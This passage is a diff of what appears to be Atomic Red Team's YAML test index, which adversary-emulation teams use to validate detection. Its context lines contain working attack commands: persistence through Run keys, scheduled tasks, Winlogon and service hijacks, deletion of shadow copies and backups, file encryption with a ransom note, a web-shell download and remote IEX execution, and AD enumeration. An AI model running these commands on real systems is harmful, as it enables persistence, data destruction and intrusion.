'sudo sed -i "\,#{pam_rule},d" #{path_to_pam_conf} - ' +' T1205.001: technique: external_references: @@ -47045,11 +47045,11 @@ persistence: command: 'reg add "hklm\system\currentcontrolset\control\print\monitors\ART" /v "Atomic Red Team" /d "#{monitor_dll}" /t REG_SZ - ' +' cleanup_command: 'reg delete "hklm\system\currentcontrolset\control\print\monitors\ART" /f >nul 2>&1 - ' +' name: command_prompt elevation_required: true T1546.013: @@ -47135,7 +47135,7 @@ persistence: profile pofile that points to a malicious executable. Upon execution, calc.exe will be launched. - ' +' supported_platforms: - windows input_arguments: @@ -47151,13 +47151,13 @@ persistence: dependencies: - description: 'Ensure a powershell profile exists for the current user - ' +' prereq_command: 'if (Test-Path #{ps_profile}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'New-Item -Path #{ps_profile} -Type File -Force - ' +' executor: command: | Add-Content #{ps_profile} -Value "" @@ -47375,14 +47375,14 @@ persistence: command: 'sudo echo osascript -e ''tell app "Finder" to display dialog "Hello World"'' >> /etc/rc.common - ' +' elevation_required: true name: bash - name: rc.common auto_generated_guid: c33f3d80-5f04-419b-a13a-854d1cbdbf3a description: 'Modify rc.common - ' +' supported_platforms: - linux executor: @@ -47398,12 +47398,12 @@ persistence: ];then sudo rm /etc/rc.common;else sudo cp $origfilename /etc/rc.common && sudo rm $origfilename;fi - ' +' - name: rc.local auto_generated_guid: 126f71af-e1c9-405c-94ef-26a47b16c102 description: 'Modify rc.local - ' +' supported_platforms: - linux executor: @@ -47419,7 +47419,7 @@ persistence: ];then sudo rm /etc/rc.local;else sudo cp $origfilename /etc/rc.local && sudo rm $origfilename;fi - ' +' T1542.004: technique: created: '2020-10-20T00:05:48.790Z' @@ -47545,10 +47545,10 @@ persistence: executor: command: 'sudo defaults write com.apple.loginwindow LoginHook #{script} - ' +' cleanup_command: 'sudo defaults delete com.apple.loginwindow LoginHook - ' +' elevation_required: true name: sh T1108: @@ -47743,11 +47743,11 @@ persistence: command: 'REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /t REG_SZ /F /D "#{command_to_execute}" - ' +' cleanup_command: 'REG DELETE "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /f >nul 2>&1 - ' +' name: command_prompt - name: Reg Key RunOnce auto_generated_guid: 554cbd88-cde1-4b56-8168-0be552eed9eb @@ -47765,11 +47765,11 @@ persistence: command: 'REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "#{thing_to_execute}" - ' +' cleanup_command: 'REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f >nul 2>&1 - ' +' name: command_prompt elevation_required: true - name: PowerShell Registry RunOnce @@ -47795,7 +47795,7 @@ persistence: cleanup_command: 'Remove-ItemProperty -Path #{reg_key_path} -Name "NextRun" -Force -ErrorAction Ignore - ' +' name: powershell elevation_required: true - name: Suspicious vbs file run from startup Folder @@ -48016,10 +48016,10 @@ persistence: ~/.ssh/authorized_keys); echo $ssh_authorized_keys > ~/.ssh/authorized_keys; fi; - ' +' cleanup_command: 'unset ssh_authorized_keys - ' +' T1053.005: technique: created: '2019-11-27T14:58:00.429Z' @@ -48117,7 +48117,7 @@ persistence: description: 'Upon successful execution, cmd.exe will create a scheduled task to spawn cmd.exe at 20:10. - ' +' supported_platforms: - windows input_arguments: @@ -48134,10 +48134,10 @@ persistence: elevation_required: false command: 'SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time} - ' +' cleanup_command: 'SCHTASKS /Delete /TN spawn /F >nul 2>&1 - ' +' - name: Scheduled task Remote auto_generated_guid: 2e5eac3e-327b-4a88-a0c0-c4057039a8dd description: | @@ -48173,11 +48173,11 @@ persistence: command: 'SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task" /TR "#{task_command}" /SC daily /ST #{time} - ' +' cleanup_command: 'SCHTASKS /Delete /S #{target} /U #{user_name} /P #{password} /TN "Atomic task" /F >nul 2>&1 - ' +' - name: Powershell Cmdlet Scheduled Task auto_generated_guid: af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd description: | @@ -48199,7 +48199,7 @@ persistence: cleanup_command: 'Unregister-ScheduledTask -TaskName "AtomicTask" -confirm:$false >$null 2>&1 - ' +' - name: Task Scheduler via VBA auto_generated_guid: ecd3fa21-7792-41a2-8726-2c5c673414d3 description: | @@ -48216,7 +48216,7 @@ persistence: dependencies: - description: 'Microsoft #{ms_product} must be installed - ' +' prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null @@ -48227,7 +48227,7 @@ persistence: get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" - ' +' executor: command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" @@ -48240,7 +48240,7 @@ persistence: login from XML by leveraging WMI class PS_ScheduledTask. Does the same thing as Register-ScheduledTask cmdlet behind the scenes. - ' +' supported_platforms: - windows executor: @@ -48252,7 +48252,7 @@ persistence: cleanup_command: 'Unregister-ScheduledTask -TaskName "T1053_005_WMI" -confirm:$false >$null 2>&1 - ' +' T1053: technique: id: attack-pattern--35dd844a-b219-4e2b-a6bb-efa9a75995a9 @@ -48388,7 +48388,7 @@ persistence: sets it as the screensaver so it will execute for persistence. Requires a reboot and logon. - ' +' supported_platforms: - windows input_arguments: @@ -48698,7 +48698,7 @@ persistence: description: 'Change Service registry ImagePath of a bengin service to a malicious file - ' +' supported_platforms: - windows input_arguments: @@ -48718,22 +48718,22 @@ persistence: dependencies: - description: 'The service must exist (#{weak_service_name}) - ' +' prereq_command: 'if (Get-Service #{weak_service_name}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'sc.exe create #{weak_service_name} binpath= "#{weak_service_path}" - ' +' executor: command: 'reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}" /f /v ImagePath /d "#{malicious_service_path}" - ' +' cleanup_command: 'sc.exe delete #{weak_service_name} - ' +' name: command_prompt T1547.009: technique: @@ -48806,7 +48806,7 @@ persistence: #{shortcut_file_path} cleanup_command: 'del -f #{shortcut_file_path} >nul 2>&1 - ' +' name: command_prompt - name: Create shortcut to cmd in startup folders auto_generated_guid: cfdc954d-4bb0-4027-875b-a1893ce406f2 @@ -48907,10 +48907,10 @@ persistence: executor: command: 'sudo touch /Library/StartupItems/EvilStartup.plist - ' +' cleanup_command: 'sudo rm /Library/StartupItems/EvilStartup.plist - ' +' name: sh elevation_required: true T1542.001: @@ -49087,7 +49087,7 @@ persistence: description: 'This test creates a Systemd service unit file and enables it as a service. - ' +' supported_platforms: - linux input_arguments: @@ -49160,15 +49160,15 @@ persistence: dependencies: - description: 'System must be Ubuntu ,Kali OR CentOS. - ' +' prereq_command: 'if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | grep -i ID=kali) ] || [ $(cat /etc/os-release | grep -i ''ID="centos"'') ]; then exit /b 0; else exit /b 1; fi; - ' +' get_prereq_command: 'echo Please run from Ubuntu ,Kali OR CentOS. - ' +' executor: name: bash elevation_required: true @@ -49320,20 +49320,20 @@ persistence: dependencies: - description: 'Check if systemd-run exists on the machine - ' +' prereq_command: 'if [ -x "$(command -v systemd-run)" ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'echo "Install systemd on the machine."; exit 1; - ' +' executor: elevation_required: false command: 'systemd-run --user --unit=Atomic-Red-Team --on-calendar ''*:0/1'' /bin/sh -c ''echo "$(date) $(whoami)" >>/tmp/log'' - ' +' cleanup_command: | systemctl --user stop Atomic-Red-Team.service systemctl --user stop Atomic-Red-Team.timer @@ -49350,20 +49350,20 @@ persistence: dependencies: - description: 'Check if systemd-run exists on the machine - ' +' prereq_command: 'if [ -x "$(command -v systemd-run)" ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'echo "Install systemd on the machine."; exit 1; - ' +' executor: elevation_required: true command: 'systemd-run --unit=Atomic-Red-Team --on-calendar ''*:0/1'' /bin/sh -c ''echo "$(date) $(whoami)" >>/tmp/log'' - ' +' cleanup_command: | systemctl stop Atomic-Red-Team.service systemctl stop Atomic-Red-Team.timer @@ -49665,13 +49665,13 @@ persistence: dependencies: - description: 'Microsoft Exchange SnapIn must be installed - ' +' prereq_command: 'Get-TransportAgent -TransportService FrontEnd - ' +' get_prereq_command: 'Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn - ' +' executor: command: | Install-TransportAgent -Name #{transport_agent_identity} -TransportAgentFactory #{class_factory} -AssemblyPath #{dll_path} @@ -49883,7 +49883,7 @@ persistence: auto_generated_guid: 94500ae1-7e31-47e3-886b-c328da46872f description: 'Adds a command to the .bash_profile file of the current user - ' +' supported_platforms: - macos - linux @@ -49895,13 +49895,13 @@ persistence: executor: command: 'echo "#{command_to_add}" >> ~/.bash_profile - ' +' name: sh - name: Add command to .bashrc auto_generated_guid: 0a898315-4cfa-4007-bafe-33a4646d115f description: 'Adds a command to the .bashrc file of the current user - ' +' supported_platforms: - macos - linux @@ -49913,7 +49913,7 @@ persistence: executor: command: 'echo "#{command_to_add}" >> ~/.bashrc - ' +' name: sh T1078: technique: @@ -50082,10 +50082,10 @@ persistence: dependencies: - description: 'Web shell must exist on disk at specified location (#{web_shells}) - ' +' prereq_command: 'if (Test-Path #{web_shells}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{web_shells}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1505.003/src/b.jsp" -OutFile "#{web_shells}/b.jsp" @@ -50094,7 +50094,7 @@ persistence: executor: command: 'xcopy /I /Y #{web_shells} #{web_shell_path} - ' +' cleanup_command: | del #{web_shell_path}\b.jsp /q >nul 2>&1 del #{web_shell_path}\tests.jsp /q >nul 2>&1 @@ -50367,10 +50367,10 @@ persistence: dependencies: - description: 'Service binary must exist on disk at specified location (#{binary_path}) - ' +' prereq_command: 'if (Test-Path #{binary_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1543.003/bin/AtomicService.exe" -OutFile "#{binary_path}" @@ -50403,10 +50403,10 @@ persistence: dependencies: - description: 'Service binary must exist on disk at specified location (#{binary_path}) - ' +' prereq_command: 'if (Test-Path #{binary_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1543.003/bin/AtomicService.exe" -OutFile "#{binary_path}" @@ -50502,11 +50502,11 @@ persistence: command: 'Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Shell" "explorer.exe, #{binary_to_execute}" -Force - ' +' cleanup_command: 'Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" -Name "Shell" -Force -ErrorAction Ignore - ' +' name: powershell - name: Winlogon Userinit Key Persistence - PowerShell auto_generated_guid: fb32c935-ee2e-454b-8fa3-1c46b42e8dfb @@ -50525,11 +50525,11 @@ persistence: command: 'Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Userinit" "Userinit.exe, #{binary_to_execute}" -Force - ' +' cleanup_command: 'Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" -Name "Userinit" -Force -ErrorAction Ignore - ' +' name: powershell - name: Winlogon Notify Key Logon Persistence - PowerShell auto_generated_guid: d40da266-e073-4e5a-bb8b-2b385023e5f9 @@ -50551,7 +50551,7 @@ persistence: cleanup_command: 'Remove-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" -Force -ErrorAction Ignore - ' +' name: powershell T1547.013: technique: @@ -50695,7 +50695,7 @@ impact: net.exe user #{user_account} #{new_password} cleanup_command: 'net.exe user #{user_account} /delete >nul 2>&1 - ' +' name: command_prompt elevation_required: true - name: Delete User - Windows @@ -50703,7 +50703,7 @@ impact: description: 'Deletes a user account to prevent access. Upon execution, run the command "net user" to verify that the new "AtomicUser" account was deleted. - ' +' supported_platforms: - windows input_arguments: @@ -50725,21 +50725,21 @@ impact: auto_generated_guid: 43f71395-6c37-498e-ab17-897d814a0947 description: 'This test will remove an account from the domain admins group - ' +' supported_platforms: - windows dependency_executor_name: powershell dependencies: - description: 'Requires the Active Directory module for powershell to be installed. - ' +' prereq_command: 'if(Get-Module -ListAvailable -Name ActiveDirectory) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Add-WindowsCapability -Online -Name "Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0" - ' +' input_arguments: super_user: description: Account used to run the execution command (must include domain). @@ -50983,10 +50983,10 @@ impact: - description: 'Secure delete tool from Sysinternals must exist on disk at specified location (#{sdelete_exe}) - ' +' prereq_command: 'if (Test-Path #{sdelete_exe}) {exit 0} else {exit 1} - ' +' get_prereq_command: | Invoke-WebRequest "https://download.sysinternals.com/files/SDelete.zip" -OutFile "$env:TEMP\SDelete.zip" Expand-Archive $env:TEMP\SDelete.zip $env:TEMP\Sdelete -Force @@ -51017,7 +51017,7 @@ impact: command: 'dd of=#{file_to_overwrite} if=#{overwrite_source} count=$(ls -l #{file_to_overwrite} | awk ''{print $5}'') iflag=count_bytes - ' +' name: bash - name: Overwrite deleted data on C drive auto_generated_guid: 321fd25e-0007-417f-adec-33232252be19 @@ -51029,7 +51029,7 @@ impact: executor: command: 'cipher.exe /w:C: - ' +' name: command_prompt T1486: technique: @@ -51109,7 +51109,7 @@ impact: auto_generated_guid: 7b8ce084-3922-4618-8d22-95f996173765 description: 'Uses gpg to encrypt a file - ' +' supported_platforms: - linux input_arguments: @@ -51133,10 +51133,10 @@ impact: dependencies: - description: 'Finds where gpg is located - ' +' prereq_command: 'which_gpg=`which gpg` - ' +' get_prereq_command: "(which yum && yum -y epel-release gpg)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y gpg)\n" executor: @@ -51145,15 +51145,15 @@ impact: command: 'echo "#{pwd_for_encrypted_file}" | $which_gpg --batch --yes --passphrase-fd 0 --cipher-algo #{encryption_alg} -o #{encrypted_file_path} -c #{input_file_path} - ' +' cleanup_command: 'rm #{encrypted_file_path} - ' +' - name: Encrypt files using 7z (Linux) auto_generated_guid: 53e6735a-4727-44cc-b35b-237682a151ad description: 'Uses 7z to encrypt a file - ' +' supported_platforms: - linux input_arguments: @@ -51173,10 +51173,10 @@ impact: dependencies: - description: 'Finds where 7z is located - ' +' prereq_command: 'which_7z=`which 7z` - ' +' get_prereq_command: '' executor: name: bash @@ -51191,7 +51191,7 @@ impact: an inturruption authentication to target system. If root permissions are not available then attempts to encrypt data within user''s home directory. - ' +' supported_platforms: - linux input_arguments: @@ -51218,7 +51218,7 @@ impact: - description: 'Finds where ccencrypt and ccdecrypt is located and copies input file - ' +' prereq_command: | which_ccencrypt=`which ccencrypt` which_ccdecrypt=`which ccdecrypt` @@ -51233,14 +51233,14 @@ impact: #{user_input_file_path}; file #{user_input_file_path}.cpt; #{impact_command}; fi - ' +' cleanup_command: "if [[ $USER == \"root\" ]]; then mv #{cped_file_path} #{root_input_file_path}; else cp #{cped_file_path} #{user_input_file_path}; fi \n" - name: Encrypt files using openssl (Linux) auto_generated_guid: 142752dc-ca71-443b-9359-cf6f497315f1 description: 'Uses openssl to encrypt a file - ' +' supported_platforms: - linux input_arguments: @@ -51268,10 +51268,10 @@ impact: dependencies: - description: 'Finds where openssl is located - ' +' prereq_command: 'which_openssl=`which openssl` - ' +' get_prereq_command: '' executor: name: bash @@ -51294,10 +51294,10 @@ impact: elevation_required: true command: 'echo T1486 - Purelocker Ransom Note > %USERPROFILE%\Desktop\YOUR_FILES.txt - ' +' cleanup_command: 'del %USERPROFILE%\Desktop\YOUR_FILES.txt >nul 2>&1 - ' +' T1565: technique: external_references: @@ -51948,18 +51948,18 @@ impact: - description: 'Create volume shadow copy of C:\ . This prereq command only works on Windows Server or Windows 8. - ' +' prereq_command: 'if(!(vssadmin.exe list shadows | findstr "No items found that satisfy the query.")) { exit 0 } else { exit 1 } - ' +' get_prereq_command: 'vssadmin.exe create shadow /for=c: - ' +' executor: command: 'vssadmin.exe delete shadows /all /quiet - ' +' name: command_prompt elevation_required: true - name: Windows - Delete Volume Shadow Copies via WMI @@ -51972,7 +51972,7 @@ impact: executor: command: 'wmic.exe shadowcopy delete - ' +' name: command_prompt elevation_required: true - name: Windows - wbadmin Delete Windows Backup Catalog @@ -51985,7 +51985,7 @@ impact: executor: command: 'wbadmin delete catalog -quiet - ' +' name: command_prompt elevation_required: true - name: Windows - Disable Windows Recovery Console Repair @@ -52016,7 +52016,7 @@ impact: executor: command: 'Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();} - ' +' name: powershell elevation_required: true - name: Windows - Delete Backup Files @@ -52030,7 +52030,7 @@ impact: command: 'del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.* c:\backup*.* c:\*.set c:\*.win c:\*.dsk - ' +' name: command_prompt elevation_required: true - name: Windows - wbadmin Delete systemstatebackup @@ -52039,13 +52039,13 @@ impact: technique is used by numerous ransomware families. This may only be successful on server platforms that have Windows Backup enabled. - ' +' supported_platforms: - windows executor: command: 'wbadmin delete systemstatebackup -keepVersions:0 - ' +' name: command_prompt elevation_required: true - name: Windows - Disable the SR scheduled task @@ -52053,17 +52053,17 @@ impact: description: 'Use schtasks.exe to disable the System Restore (SR) scheduled task - ' +' supported_platforms: - windows executor: command: 'schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable - ' +' cleanup_command: 'schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /enable >nul 2>&1 - ' +' name: command_prompt elevation_required: true T1491.001: @@ -52125,7 +52125,7 @@ impact: auto_generated_guid: 30558d53-9d76-41c4-9267-a7bd5184bed3 description: 'Downloads an image from a URL and sets it as the desktop wallpaper. - ' +' supported_platforms: - windows input_arguments: @@ -52492,7 +52492,7 @@ impact: executor: command: 'yes > /dev/null - ' +' name: bash T1565.003: technique: @@ -52710,10 +52710,10 @@ impact: executor: command: 'sc.exe stop #{service_name} - ' +' cleanup_command: 'sc.exe start #{service_name} >nul 2>&1 - ' +' name: command_prompt elevation_required: true - name: Windows - Stop service using net.exe @@ -52732,10 +52732,10 @@ impact: executor: command: 'net.exe stop #{service_name} - ' +' cleanup_command: 'net.exe start #{service_name} >nul 2>&1 - ' +' name: command_prompt elevation_required: true - name: Windows - Stop service by killing process @@ -52755,7 +52755,7 @@ impact: executor: command: 'taskkill.exe /f /im #{process_name} - ' +' name: command_prompt T1565.001: technique: @@ -52866,7 +52866,7 @@ impact: auto_generated_guid: ad254fa8-45c0-403b-8c77-e00b3d3e7a64 description: 'This test shuts down a Windows system. - ' +' supported_platforms: - windows input_arguments: @@ -52877,14 +52877,14 @@ impact: executor: command: 'shutdown /s /t #{timeout} - ' +' name: command_prompt elevation_required: true - name: Restart System - Windows auto_generated_guid: f4648f0d-bf78-483c-bafc-3ec99cd1c302 description: 'This test restarts a Windows system. - ' +' supported_platforms: - windows input_arguments: @@ -52895,14 +52895,14 @@ impact: executor: command: 'shutdown /r /t #{timeout} - ' +' name: command_prompt elevation_required: true - name: Restart System via `shutdown` - macOS/Linux auto_generated_guid: 6326dbc4-444b-4c04-88f4-27e94d0327cb description: 'This test restarts a macOS/Linux system. - ' +' supported_platforms: - macos - linux @@ -52914,14 +52914,14 @@ impact: executor: command: 'shutdown -r #{timeout} - ' +' name: bash elevation_required: true - name: Shutdown System via `shutdown` - macOS/Linux auto_generated_guid: 4963a81e-a3ad-4f02-adda-812343b351de description: 'This test shuts down a macOS/Linux system using a halt. - ' +' supported_platforms: - macos - linux @@ -52933,73 +52933,73 @@ impact: executor: command: 'shutdown -h #{timeout} - ' +' name: bash elevation_required: true - name: Restart System via `reboot` - macOS/Linux auto_generated_guid: 47d0b042-a918-40ab-8cf9-150ffe919027 description: 'This test restarts a macOS/Linux system via `reboot`. - ' +' supported_platforms: - macos - linux executor: command: 'reboot - ' +' name: bash elevation_required: true - name: Shutdown System via `halt` - Linux auto_generated_guid: 918f70ab-e1ef-49ff-bc57-b27021df84dd description: 'This test shuts down a Linux system using `halt`. - ' +' supported_platforms: - linux executor: command: 'halt -p - ' +' name: bash elevation_required: true - name: Reboot System via `halt` - Linux auto_generated_guid: 78f92e14-f1e9-4446-b3e9-f1b921f2459e description: 'This test restarts a Linux system using `halt`. - ' +' supported_platforms: - linux executor: command: 'halt --reboot - ' +' name: bash elevation_required: true - name: Shutdown System via `poweroff` - Linux auto_generated_guid: 73a90cd2-48a2-4ac5-8594-2af35fa909fa description: 'This test shuts down a Linux system using `poweroff`. - ' +' supported_platforms: - linux executor: command: 'poweroff - ' +' name: bash elevation_required: true - name: Reboot System via `poweroff` - Linux auto_generated_guid: 61303105-ff60-427b-999e-efb90b314e41 description: 'This test restarts a Linux system using `poweroff`. - ' +' supported_platforms: - linux executor: command: 'poweroff --reboot - ' +' name: bash elevation_required: true T1565.002: @@ -53170,10 +53170,10 @@ discovery: dependencies: - description: 'T1010.cs must exist on disk at specified location (#{input_source_code}) - ' +' prereq_command: 'if (Test-Path #{input_source_code}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{input_source_code}) -ErrorAction ignore | Out-Null Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1010/src/T1010.cs -OutFile "#{input_source_code}" @@ -53183,7 +53183,7 @@ discovery: #{output_file_name} cleanup_command: 'del /f /q /s #{output_file_name} >nul 2>&1 - ' +' name: command_prompt T1217: technique: @@ -53233,7 +53233,7 @@ discovery: description: 'Searches for Mozilla Firefox''s places.sqlite file (on Linux distributions) that contains bookmarks and lists any found instances to a text file. - ' +' supported_platforms: - linux input_arguments: @@ -53247,14 +53247,14 @@ discovery: cat #{output_file} 2>/dev/null cleanup_command: 'rm -f #{output_file} 2>/dev/null - ' +' name: sh - name: List Mozilla Firefox Bookmark Database Files on macOS auto_generated_guid: 1ca1f9c7-44bc-46bb-8c85-c50e2e94267b description: 'Searches for Mozilla Firefox''s places.sqlite file (on macOS) that contains bookmarks and lists any found instances to a text file. - ' +' supported_platforms: - macos input_arguments: @@ -53268,14 +53268,14 @@ discovery: cat #{output_file} 2>/dev/null cleanup_command: 'rm -f #{output_file} 2>/dev/null - ' +' name: sh - name: List Google Chrome Bookmark JSON Files on macOS auto_generated_guid: b789d341-154b-4a42-a071-9111588be9bc description: 'Searches for Google Chrome''s Bookmark file (on macOS) that contains bookmarks in JSON format and lists any found instances to a text file. - ' +' supported_platforms: - macos input_arguments: @@ -53289,7 +53289,7 @@ discovery: cat #{output_file} 2>/dev/null cleanup_command: 'rm -f #{output_file} 2>/dev/null - ' +' name: sh - name: List Google Chrome / Opera Bookmarks on Windows with powershell auto_generated_guid: faab755e-4299-48ec-8202-fc7885eb6545 @@ -53302,7 +53302,7 @@ discovery: command: 'Get-ChildItem -Path C:\Users\ -Filter Bookmarks -Recurse -ErrorAction SilentlyContinue -Force - ' +' name: powershell - name: List Google Chrome / Edge Chromium Bookmarks on Windows with command prompt auto_generated_guid: 76f71e2f-480e-4bed-b61e-398fe17499d5 @@ -53314,7 +53314,7 @@ discovery: executor: command: 'where /R C:\Users\ Bookmarks - ' +' name: command_prompt - name: List Mozilla Firefox bookmarks on Windows with command prompt auto_generated_guid: 4312cdbc-79fc-4a9c-becc-53d49c734bc5 @@ -53326,7 +53326,7 @@ discovery: executor: command: 'where /R C:\Users\ places.sqlite - ' +' name: command_prompt - name: List Internet Explorer Bookmarks using the command prompt auto_generated_guid: 727dbcdb-e495-4ab1-a6c4-80c7f77aef85 @@ -53337,7 +53337,7 @@ discovery: executor: command: 'dir /s /b %USERPROFILE%\Favorites - ' +' name: command_prompt T1087.004: technique: @@ -53784,7 +53784,7 @@ discovery: description: 'Enumerate all accounts via PowerShell. Upon execution, lots of user account and group information will be displayed. - ' +' supported_platforms: - windows executor: @@ -53798,7 +53798,7 @@ discovery: description: 'Enumerate logged on users. Upon exeuction, logged on users will be displayed. - ' +' supported_platforms: - windows input_arguments: @@ -53809,7 +53809,7 @@ discovery: executor: command: 'query user /SERVER:#{computer_name} - ' +' name: command_prompt - name: Automated AD Recon (ADRecon) auto_generated_guid: 95018438-454a-468c-a0fa-59c800149b59 @@ -53827,18 +53827,18 @@ discovery: dependencies: - description: 'ADRecon must exist on disk at specified location (#{adrecon_path}) - ' +' prereq_command: 'if (Test-Path #{adrecon_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Invoke-WebRequest -Uri "https://raw.githubusercontent.com/sense-of-security/ADRecon/38e4abae3e26d0fa87281c1d0c65cabd4d3c6ebd/ADRecon.ps1" -OutFile #{adrecon_path} - ' +' executor: command: 'Invoke-Expression #{adrecon_path} - ' +' cleanup_command: | Remove-Item #{adrecon_path} -Force -ErrorAction Ignore | Out-Null Get-ChildItem $env:TEMP -Recurse -Force | Where{$_.Name -Match "^ADRecon-Report-"} | Remove-Item -Force -Recurse @@ -53859,14 +53859,14 @@ discovery: dependencies: - description: 'AdFind.exe must exist on disk at specified location (#{adfind_path}) - ' +' prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} - ' +' executor: command: "#{adfind_path} -default -s base lockoutduration lockoutthreshold lockoutobservationwindow maxpwdage minpwdage minpwdlength pwdhistorylength @@ -53888,14 +53888,14 @@ discovery: dependencies: - description: 'AdFind.exe must exist on disk at specified location (#{adfind_path}) - ' +' prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} - ' +' executor: command: "#{adfind_path} -sc admincountdmp\n" name: command_prompt @@ -53915,14 +53915,14 @@ discovery: dependencies: - description: 'AdFind.exe must exist on disk at specified location (#{adfind_path}) - ' +' prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} - ' +' executor: command: "#{adfind_path} -f (objectcategory=person)\n" name: command_prompt @@ -53942,14 +53942,14 @@ discovery: dependencies: - description: 'AdFind.exe must exist on disk at specified location (#{adfind_path}) - ' +' prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} - ' +' executor: command: "#{adfind_path} -sc exchaddresses\n" name: command_prompt @@ -53958,13 +53958,13 @@ discovery: description: 'This test will enumerate the details of the built-in domain admin account - ' +' supported_platforms: - windows executor: command: 'net user administrator /domain - ' +' name: command_prompt - name: Enumerate Active Directory for Unconstrained Delegation auto_generated_guid: 46f8dbe9-22a5-4770-8513-66119c5be63b @@ -53987,7 +53987,7 @@ discovery: dependencies: - description: 'PowerShell ActiveDirectory Module must be installed - ' +' prereq_command: | Try { Import-Module ActiveDirectory -ErrorAction Stop | Out-Null @@ -54008,7 +54008,7 @@ discovery: command: 'Get-ADObject -LDAPFilter ''(UserAccountControl:1.2.840.113556.1.4.803:=#{uac_prop})'' -Server #{domain} - ' +' T1069.002: technique: external_references: @@ -54076,7 +54076,7 @@ discovery: executor: command: 'get-ADPrincipalGroupMembership #{user} | select name - ' +' name: powershell - name: Elevated group enumeration using net group (Domain) auto_generated_guid: 0afb5163-8181-432e-9405-4322710c0c37 @@ -54098,7 +54098,7 @@ discovery: execution, progress and info about each host in the domain being scanned will be displayed. - ' +' supported_platforms: - windows executor: @@ -54112,7 +54112,7 @@ discovery: machines in the domain. Upon execution, information about each machine will be displayed. - ' +' supported_platforms: - windows executor: @@ -54125,7 +54125,7 @@ discovery: description: 'takes a computer and determines who has admin rights over it through GPO enumeration. Upon execution, information about the machine will be displayed. - ' +' supported_platforms: - windows input_arguments: @@ -54143,39 +54143,39 @@ discovery: description: 'When successful, accounts that do not require kerberos pre-auth will be returned - ' +' supported_platforms: - windows dependency_executor_name: powershell dependencies: - description: 'Computer must be domain joined. - ' +' prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Write-Host Joining this computer to a domain must be done manually. - ' +' - description: 'Requires the Active Directory module for powershell to be installed. - ' +' prereq_command: 'if(Get-Module -ListAvailable -Name ActiveDirectory) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Add-WindowsCapability -Online -Name "Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0" - ' +' executor: name: powershell elevation_required: false command: 'get-aduser -f * -pr DoesNotRequirePreAuth | where {$_.DoesNotRequirePreAuth -eq $TRUE} - ' +' - name: Adfind - Query Active Directory Groups 